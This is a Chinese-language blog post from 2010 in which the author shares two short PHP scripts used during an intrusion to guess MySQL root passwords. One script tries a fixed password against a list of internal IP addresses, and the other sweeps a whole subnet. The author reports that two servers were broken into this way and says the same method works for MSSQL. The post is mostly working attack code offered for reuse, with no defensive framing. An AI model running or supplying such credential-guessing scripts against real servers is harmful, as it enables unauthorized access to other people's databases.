放个简单的MYSQL服务器猜密码脚本

angel 发表于 2010-01-25, 4:19 AM. 发表在: 技术相关

昨日渗透时 , 整段都是MYSQL服务器。在某个WEB下。用如下脚本来猜了一下MYSQL密码。还真有两个。在WEB下用脚本来弄也方便快捷。MSSQL的同理。。

这个是已知开了3306的。。

<?php

$hostdb = array(
	'192.168.168.10',
	'192.168.168.20',
	'192.168.168.20',
	'192.168.168.40',
	'192.168.168.50',
	'192.168.168.60',
	'192.168.168.70',
	'192.168.168.80',
	'192.168.168.90',
	'192.168.168.100'
);

$dbu = 'root';
$dbp = '1qaz2wsx';

foreach ($hostdb as $host) {
	if(@mysql_connect($host, $dbu, $dbp)) {
		echo $host.' - '.$dbu.' - '.$dbp.' ... OK<br>';
	}
}

echo 'done.';

?>

举一反三,这是全段猜的。

<?php

$ips = '192.168.168.';
$dbu = 'root';
$dbp = '1qaz2wsx';

for ($i=1; $i<254; $i++) {
	if(@mysql_connect($ips.$i, $dbu, $dbp)) {
		echo $ips.$i.' - '.$dbu.' - '.$dbp.' ... OK<br>';
	}
}

echo 'done.';

?>

上一篇: Sablog-X 2.0 Beta(20100124)
下一篇: 记录一个MSSQL的小技巧

访客评论

  1. #11 angel 2010-02-06, 2:03 AM
    有什么问题呢?执行看看呀。
  2. #12 冷月渡云 2010-02-09, 12:33 AM
    道歉了,少看了不得. 连接符号
  3. #13 huihui 2010-03-13, 10:54 PM
    你好,看了你的博客 能看出来你是网站的设计高手哈,现在我有个问题想请教下,一个类似新浪的门户网站如何在本地测试,我配置了asp环境,是否还要配置php运行环境,配置好又该如何修改数据库?有论坛,我需要做哪些?该如何做。联系QQ:136172081  希望能得到你的帮助。
Total: 13Page 2 of 2‹ Prev12

发表评论

评论内容 (必填):

点击获得Trackback地址
My E-mail